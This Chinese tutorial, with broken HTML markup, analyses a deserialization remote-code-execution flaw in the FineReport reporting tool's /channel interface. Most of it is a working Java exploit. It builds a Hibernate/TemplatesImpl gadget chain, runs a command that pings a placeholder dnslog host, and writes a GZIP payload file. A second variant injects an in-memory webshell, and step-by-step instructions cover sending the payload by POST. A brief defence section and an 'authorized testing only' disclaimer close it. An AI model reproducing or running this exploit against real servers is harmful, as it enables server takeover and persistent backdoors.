帆软报表 Channel 反序列化漏洞分析与利用教学文档<\/h1>

0x00 漏洞概述<\/h2>
帆软报表(FineReport)是一款企业级报表工具，其`\/channel<\/code>接口存在反序列化漏洞，攻击者可通过构造恶意序列化数据实现远程代码执行(RCE)。该漏洞存在于com.fr.decision.extension.report.api.remote.RemoteDesignResource.onMessage<\/code>方法中，通过GZip压缩的序列化数据处理流程存在安全隐患。<\/p>`

0x01 漏洞分析<\/h2>
漏洞入口点<\/h3>
漏洞触发路径：<\/p>
\/channel -> RemoteDesignResource.onMessage -> WorkContext.handleMessage -> deserializeInvocation
<\/code><\/pre>
关键处理类：<\/p>
com.<\/span>fr<\/span>.<\/span>decision<\/span>.<\/span>extension<\/span>.<\/span>report<\/span>.<\/span>api<\/span>.<\/span>remote<\/span>.<\/span>RemoteDesignResource<\/span>.<\/span>onMessage<\/span>
<\/span><\/span><\/code><\/pre>反序列化流程<\/h3>


初始处理<\/strong>：<\/p>

onMessage<\/code>方法接收输入数据var1<\/code><\/li>
对var1<\/code>进行包装处理<\/li>
调用WorkContext.handleMessage<\/code>进行处理<\/li>
<\/ul>
<\/li>

序列化处理链<\/strong>：<\/p>

WorkspaceServerInvoker.handleMessage<\/code>调用deserializeInvocation<\/code><\/li>
deserializeInvocation<\/code>使用GZipSerializerWrapper.wrap<\/code>方法返回GZipSerializerWrapper<\/code>对象<\/li>
InvocationSerializer.getDefault()<\/code>返回InvocationSerializer<\/code>对象<\/li>
<\/ul>
<\/li>

反序列化执行<\/strong>：<\/p>

最终调用public static Object deserialize(byte[] var0, Serializer var1)<\/code>方法<\/li>
使用var1<\/code>(即GZipSerializerWrapper<\/code>对象)的deserialize<\/code>方法处理数据<\/li>
内部调用InvocationSerializer<\/code>对象的deserialize<\/code>方法<\/li>
触发两次readObject<\/code>调用<\/li>
<\/ul>
<\/li>
<\/ol>
0x02 利用链分析 (v10.0.10版本)<\/h2>
利用链选择<\/h3>
由于帆软报表内置了类似Shiro的反序列化机制，但有以下限制：<\/p>

内置的InvokerTransformer<\/code>未实现Serializable<\/code>接口<\/li>
没有PropertyUtils<\/code>类<\/li>
<\/ul>
因此选择Hibernate链结合TemplatesImpl<\/code>类，通过触发getOutputProperties<\/code>方法中的newTransformer()<\/code>实现任意方法调用。<\/p>
利用链组成<\/h3>


核心组件<\/strong>：<\/p>

com.fr.third.org.hibernate.type.ComponentType<\/code><\/li>
com.fr.third.org.hibernate.tuple.component.PojoComponentTuplizer<\/code><\/li>
com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer<\/code><\/li>
<\/ul>
<\/li>

执行链<\/strong>：<\/p>

通过TemplatesImpl<\/code>加载恶意字节码<\/li>
使用Hibernate的Getter机制触发getOutputProperties<\/code><\/li>
通过ComponentType<\/code>的getHashCode<\/code>方法触发整个调用链<\/li>
<\/ul>
<\/li>
<\/ol>
0x03 漏洞利用实现<\/h2>
基础利用POC<\/h3>
public<\/span> class<\/span> HibernateExp<\/span> {<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置对象字段值的工具方法
<\/span><\/span><\/span><\/span>    public<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object obj,<\/span> String fieldName,<\/span> Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建无构造函数的对象实例
<\/span><\/span><\/span><\/span>    public<\/span> static<\/span> Object createWithoutConstructor<\/span>(<\/span>Class aa)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        ReflectionFactory reflectionFactory =<\/span> ReflectionFactory.<\/span>getReflectionFactory<\/span>();<\/span>
<\/span><\/span>        Object o =<\/span> reflectionFactory.<\/span>newConstructorForSerialization<\/span>(<\/span>aa,<\/span> 
<\/span><\/span>            Object.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>()).<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>        return<\/span> o;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 加载必要的Hibernate类
<\/span><\/span><\/span><\/span>        Class<?><\/span> componentTypeClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.type.ComponentType"<\/span>);<\/span>
<\/span><\/span>        Class<?><\/span> pojoComponentTuplizerClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.tuple.component.PojoComponentTuplizer"<\/span>);<\/span>
<\/span><\/span>        Class<?><\/span> abstractComponentTuplizerClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构造恶意命令
<\/span><\/span><\/span><\/span>        String cmd =<\/span> "java.lang.Runtime.getRuntime().exec(\"ping -c 1 xxxx.dnslog.pw\");"<\/span>;<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 动态生成恶意字节码
<\/span><\/span><\/span><\/span>        ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>        CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"Evil"<\/span>);<\/span>
<\/span><\/span>        ctClass.<\/span>makeClassInitializer<\/span>().<\/span>insertBefore<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>        ctClass.<\/span>setSuperclass<\/span>(<\/span>pool.<\/span>get<\/span>(<\/span>AbstractTranslet.<\/span>class<\/span>.<\/span>getName<\/span>()));<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 配置TemplatesImpl
<\/span><\/span><\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "HibernateExp"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytes});<\/span>
<\/span><\/span>        
<\/span><\/span>        Method getOutputProperties =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"getOutputProperties"<\/span>);<\/span>
<\/span><\/span>        Object getter;<\/span>
<\/span><\/span>        
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 尝试使用GetterMethodImpl
<\/span><\/span><\/span><\/span>            Class<?><\/span> getterImpl =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.property.access.spi.GetterMethodImpl"<\/span>);<\/span>
<\/span><\/span>            Constructor<?><\/span> constructor =<\/span> getterImpl.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>            constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            getter =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>null<\/span>,<\/span> null<\/span>,<\/span> getOutputProperties);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {<\/span>
<\/span><\/span>            \/\/ 回退到BasicGetter
<\/span><\/span><\/span><\/span>            Class<?><\/span> basicGetter =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.fr.third.org.hibernate.property.BasicPropertyAccessor$BasicGetter"<\/span>);<\/span>
<\/span><\/span>            Constructor<?><\/span> constructor =<\/span> basicGetter.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Method.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>            constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            getter =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>templates.<\/span>getClass<\/span>(),<\/span> getOutputProperties,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 配置PojoComponentTuplizer
<\/span><\/span><\/span><\/span>        Object tuplizer =<\/span> createWithoutConstructor(<\/span>pojoComponentTuplizerClass);<\/span>
<\/span><\/span>        Field field =<\/span> abstractComponentTuplizerClass.<\/span>getDeclaredField<\/span>(<\/span>"getters"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object getters =<\/span> Array.<\/span>newInstance<\/span>(<\/span>getter.<\/span>getClass<\/span>(),<\/span> 1<\/span>);<\/span>
<\/span><\/span>        Array.<\/span>set<\/span>(<\/span>getters,<\/span> 0<\/span>,<\/span> getter);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>tuplizer,<\/span> getters);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 配置ComponentType
<\/span><\/span><\/span><\/span>        Object type =<\/span> createWithoutConstructor(<\/span>componentTypeClass);<\/span>
<\/span><\/span>        Field field1 =<\/span> componentTypeClass.<\/span>getDeclaredField<\/span>(<\/span>"componentTuplizer"<\/span>);<\/span>
<\/span><\/span>        field1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field1.<\/span>set<\/span>(<\/span>type,<\/span> tuplizer);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field field2 =<\/span> componentTypeClass.<\/span>getDeclaredField<\/span>(<\/span>"propertySpan"<\/span>);<\/span>
<\/span><\/span>        field2.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field2.<\/span>set<\/span>(<\/span>type,<\/span> 1<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field field3 =<\/span> componentTypeClass.<\/span>getDeclaredField<\/span>(<\/span>"propertyTypes"<\/span>);<\/span>
<\/span><\/span>        field3.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field3.<\/span>set<\/span>(<\/span>type,<\/span> new<\/span> Type[]{(<\/span>Type)<\/span> type});<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 创建TypedValue触发点
<\/span><\/span><\/span><\/span>        TypedValue typedValue =<\/span> new<\/span> TypedValue((<\/span>Type)<\/span> type,<\/span> null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 构造最终Payload
<\/span><\/span><\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>typedValue,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 防止put时触发，后设置value
<\/span><\/span><\/span><\/span>        Field valueField =<\/span> TypedValue.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"value"<\/span>);<\/span>
<\/span><\/span>        valueField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        valueField.<\/span>set<\/span>(<\/span>typedValue,<\/span> templates);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化Payload
<\/span><\/span><\/span><\/span>        byte<\/span>[]<\/span> serialize =<\/span> Serializer.<\/span>serialize<\/span>(<\/span>hashMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 生成GZIP压缩的Payload文件
<\/span><\/span><\/span><\/span>        String fileName =<\/span> "ser.bin"<\/span>;<\/span>
<\/span><\/span>        FileOutputStream fos =<\/span> new<\/span> FileOutputStream(<\/span>fileName);<\/span>
<\/span><\/span>        GZIPOutputStream gzip =<\/span> new<\/span> GZIPOutputStream(<\/span>fos);<\/span>
<\/span><\/span>        gzip.<\/span>write<\/span>(<\/span>serialize);<\/span>
<\/span><\/span>        gzip.<\/span>finish<\/span>();<\/span>
<\/span><\/span>        fos.<\/span>close<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>内存马利用<\/h3>
将基础POC中的命令执行部分替换为内存马实现：<\/p>
\/\/ 替换cmd部分为内存马
<\/span><\/span><\/span><\/span>String memshell =<\/span> "Base64编码的内存马"<\/span>;<\/span>
<\/span><\/span>ClassPool pool =<\/span> new<\/span> ClassPool();<\/span>
<\/span><\/span>pool.<\/span>insertClassPath<\/span>(<\/span>new<\/span> ClassClassPath(<\/span>AbstractTranslet.<\/span>class<\/span>));<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bytes =<\/span> new<\/span> BASE64Decoder().<\/span>decodeBuffer<\/span>(<\/span>memshell);<\/span>
<\/span><\/span>
<\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "HibernateExp"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytes});<\/span>
<\/span><\/span>\/\/ 注意：内存马版本可能不需要_tfactory
<\/span><\/span><\/span><\/code><\/pre>0x04 漏洞利用步骤<\/h2>


构造恶意类<\/strong>：<\/p>

使用Javassist动态生成继承AbstractTranslet<\/code>的恶意类<\/li>
在类初始化块中插入恶意代码或内存马<\/li>
<\/ul>
<\/li>

配置TemplatesImpl<\/strong>：<\/p>

设置_name<\/code>、_bytecodes<\/code>等必要字段<\/li>
可选设置_tfactory<\/code>（某些环境需要）<\/li>
<\/ul>
<\/li>

构建Hibernate链<\/strong>：<\/p>

创建GetterMethodImpl<\/code>或BasicGetter<\/code>实例<\/li>
配置PojoComponentTuplizer<\/code>和ComponentType<\/code><\/li>
通过反射设置必要字段<\/li>
<\/ul>
<\/li>

构造触发HashMap<\/strong>：<\/p>

使用TypedValue<\/code>作为Key<\/li>
通过反射延迟设置value以避免提前触发<\/li>
<\/ul>
<\/li>

序列化Payload<\/strong>：<\/p>

使用GZIP压缩序列化数据<\/li>
生成最终的ser.bin<\/code>文件<\/li>
<\/ul>
<\/li>

发送Payload<\/strong>：<\/p>

将生成的Payload通过\/channel<\/code>接口发送<\/li>
使用POST请求，Content-Type设置为application\/json<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
0x05 防御建议<\/h2>


临时解决方案<\/strong>：<\/p>

禁用\/channel<\/code>接口访问<\/li>
配置WAF拦截可疑的反序列化请求<\/li>
<\/ul>
<\/li>

长期解决方案<\/strong>：<\/p>

升级到最新版本帆软报表<\/li>
实施反序列化白名单机制<\/li>
使用Java安全管理器限制危险操作<\/li>
<\/ul>
<\/li>

检测方法<\/strong>：<\/p>

监控\/channel<\/code>接口的异常访问<\/li>
检查日志中可疑的序列化数据特征<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 参考资源<\/h2>

Hibernate反序列化链研究资料<\/li>
Java反序列化漏洞利用技术<\/li>
帆软报表官方安全公告<\/li>
ysoserial工具链分析<\/li>
<\/ul>

本教学文档详细分析了帆软报表Channel接口的反序列化漏洞原理、利用链构造方法以及实际利用过程，包括基础命令执行和内存马植入两种利用方式。使用时请遵守相关法律法规，仅用于授权测试和安全研究目的。<\/p>